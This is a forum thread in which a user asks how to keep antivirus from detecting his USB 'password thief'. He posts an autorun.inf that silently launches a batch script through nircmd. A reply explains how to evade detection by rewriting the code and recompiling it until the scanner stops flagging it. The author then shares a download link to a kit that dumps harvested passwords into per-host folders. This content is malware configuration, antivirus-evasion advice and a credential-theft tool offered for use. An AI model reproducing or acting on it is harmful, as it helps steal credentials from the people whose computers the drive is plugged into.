Jump to content

How to make autorun.if undetect

Snip3r

By Snip3r
in Questions

 Share

Recommended Posts

Snip3r Newbie

Snip3r

Posted
Posted

hey..Sup guy's.....???

i have some problems with my autorun.inf

i coded a smal password thief...[like usb thief]....but my av detcted it....any suggestions??..

srry...im new in coding...it is a new project for me...

thnxz in advance...

grtz

Link to comment
Share on other sites
VaKo Newbie

VaKo

Posted
Posted

FFS you mupet, where is your source code, where is the history of troubleshooting steps you have taken? And where the hell is the actual information on the problem... you know, the stuff we can look at and go "well here's your problem". If you want help, fine, but at least tell us what the problem is beyond "I tried to make something to do x and it didn't work"...

Link to comment
Share on other sites
Snip3r Newbie

Snip3r

Posted
  • Author
Posted

sorry guy's for my topic....ur right abt the info....

ok...

i have this problem....when i want to test my thief, my av detect it as INF/autorun virus

this is the autorunfile

[autorun]

action=Open Files On Folder

icon=icons\drive.ico

shellexecute=nircmd.exe execmd CALL batexe\progstart.bat

is there a way to hide the autorun??...like with attrib??

Link to comment
Share on other sites
Steve8x Newbie

Steve8x

Posted
Posted
sorry guy's for my topic....ur right abt the info....

ok...

i have this problem....when i want to test my thief, my av detect it as INF/autorun virus

this is the autorunfile

[autorun]

action=Open Files On Folder

icon=icons\drive.ico

shellexecute=nircmd.exe execmd CALL batexe\progstart.bat

is there a way to hide the autorun??...like with attrib??

hiding the autorun.inf wont change anything... Get rid of the autorun.inf, and youll still be detected...

it isn't the autorun.inf that is detected! it is the program your executing with it!

nircmd? I'm not sure what that is but I don't think you coded it... As i've heard someone else talk about it before you... What you need to do is actually write your own source code. Then you shouldn't be detected, even if you are you can then modify the source easily and make it undetectable... what does this "password theif" actually do? take passwords from firefox + IE?(thats my guess) replicate what it does with code in a new project. Is this program packed? If not you can easily dissemble it and see the functions + API's it calls

you shouldn't be using nircmd at all, it should say shellexecute=myprogram.exe

Without source code your screwed. You need it to be able easily take code out(commenting code) and recompile it into a new exe. That's what helps you in determining what is detected and what is not. Code that is detected must be modified! Code that is not can be left alone.

Link to comment
Share on other sites
Snip3r Newbie

Snip3r

Posted
  • Author
Posted
hiding the autorun.inf wont change anything... Get rid of the autorun.inf, and youll still be detected...

it isn't the autorun.inf that is detected! it is the program your executing with it!

nircmd? I'm not sure what that is but I don't think you coded it... As i've heard someone else talk about it before you... What you need to do is actually write your own source code. Then you shouldn't be detected, even if you are you can then modify the source easily and make it undetectable... what does this "password theif" actually do? take passwords from firefox + IE?(thats my guess) replicate what it does with code in a new project. Is this program packed? If not you can easily dissemble it and see the functions + API's it calls

you shouldn't be using nircmd at all, it should say shellexecute=myprogram.exe

Without source code your screwed. You need it to be able easily take code out(commenting code) and recompile it into a new exe. That's what helps you in determining what is detected and what is not. Code that is detected must be modified! Code that is not can be left alone.

Thnxz m8...

i allready fixed it........

here u have it...u have to do the same...

Password Recovery Utilities

Network Monitoring Tools

Internet Related Utilities

Command-Line Utilities

Desktop Utilities

Freeware System Tools

http://www.nirsoft.net

Using the autorun.inf, nirsoft programs and 5 bat files! Everything'll dumped in the folder Dump, with a foldername from that hostname.

autorun.inf

[autorun] 
action=Open Files On Folder
icon=icons\drive.ico
shellexecute=nircmd.exe execmd CALL batexe\progstart.bat

http://members.lycos.nl/pih/bl00dburn3r/nirsoft_auto.rar

enjoy

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
 Share
Go to topic listing

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...